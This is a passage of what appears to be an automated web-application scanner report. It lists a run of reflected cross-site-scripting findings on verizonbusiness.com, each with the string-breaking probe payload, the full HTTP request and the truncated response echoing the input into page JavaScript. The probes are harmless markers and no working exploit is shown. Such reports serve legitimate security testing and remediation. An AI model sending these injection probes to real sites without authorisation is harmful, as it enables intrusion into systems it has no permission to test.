Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41928
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/sustainabilitydf1cb";0597c569708/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.908. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/sustainability/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c77a5'%3b57909570fab was submitted in the REST URL parameter 3. This input was echoed as c77a5';57909570fab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/sustainabilityc77a5'%3b57909570fab/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41928
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/sustainabilityc77a5';57909570fab/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.909. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0e3e"%3bd581221d59a was submitted in the REST URL parameter 1. This input was echoed as d0e3e";d581221d59a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd0e3e"%3bd581221d59a/bysolutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsd0e3e";d581221d59a/bysolutions/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.910. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b74c5'%3b9376f3b2b0c was submitted in the REST URL parameter 1. This input was echoed as b74c5';9376f3b2b0c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsb74c5'%3b9376f3b2b0c/bysolutions/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:12 GMT
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsb74c5';9376f3b2b0c/bysolutions/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.911. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76c4'%3b41220c1f1ed was submitted in the REST URL parameter 2. This input was echoed as d76c4';41220c1f1ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsd76c4'%3b41220c1f1ed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41854
Date: Wed, 17 Nov 2010 00:34:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsd76c4';41220c1f1ed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.912. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0d6"%3b9fd3e078299 was submitted in the REST URL parameter 2. This input was echoed as 4d0d6";9fd3e078299 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions4d0d6"%3b9fd3e078299/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:22 GMT
Content-Type: text/html
Content-Length: 41856
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions4d0d6";9fd3e078299/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.913. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a621e"%3be42f17bb74f was submitted in the REST URL parameter 1. This input was echoed as a621e";e42f17bb74f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsa621e"%3be42f17bb74f/bysolutions/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:35:14 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsa621e";e42f17bb74f/bysolutions/app-performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.914. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31dba'%3b974b3467b09 was submitted in the REST URL parameter 1. This input was echoed as 31dba';974b3467b09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions31dba'%3b974b3467b09/bysolutions/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:43 GMT
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions31dba';974b3467b09/bysolutions/app-performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.915. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f40"%3bbb5a166c388 was submitted in the REST URL parameter 2. This input was echoed as f3f40";bb5a166c388 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsf3f40"%3bbb5a166c388/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:01 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 41886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsf3f40";bb5a166c388/app-performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.916. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4765'%3bbb591b4472e was submitted in the REST URL parameter 2. This input was echoed as c4765';bb591b4472e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsc4765'%3bbb591b4472e/app-performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:17 GMT
Content-Type: text/html
Content-Length: 41888
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsc4765';bb591b4472e/app-performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.917. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 442ee'%3b14611cfe4f6 was submitted in the REST URL parameter 3. This input was echoed as 442ee';14611cfe4f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/app-performance442ee'%3b14611cfe4f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:21 GMT
Content-Type: text/html
Content-Length: 43112
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/app-performance442ee';14611cfe4f6/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.918. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/app-performance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f9e7"%3b4cdbc237f8c was submitted in the REST URL parameter 3. This input was echoed as 2f9e7";4cdbc237f8c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/app-performance2f9e7"%3b4cdbc237f8c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43110
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/app-performance2f9e7";4cdbc237f8c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.919. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 336dd"%3bc7ef86c583f was submitted in the REST URL parameter 1. This input was echoed as 336dd";c7ef86c583f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions336dd"%3bc7ef86c583f/bysolutions/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:45 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions336dd";c7ef86c583f/bysolutions/automation/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.920. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/automation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac984'%3b0aa0fbffa62 was submitted in the REST URL parameter 1. This input was echoed as ac984';0aa0fbffa62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsac984'%3b0aa0fbffa62/bysolutions/automation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
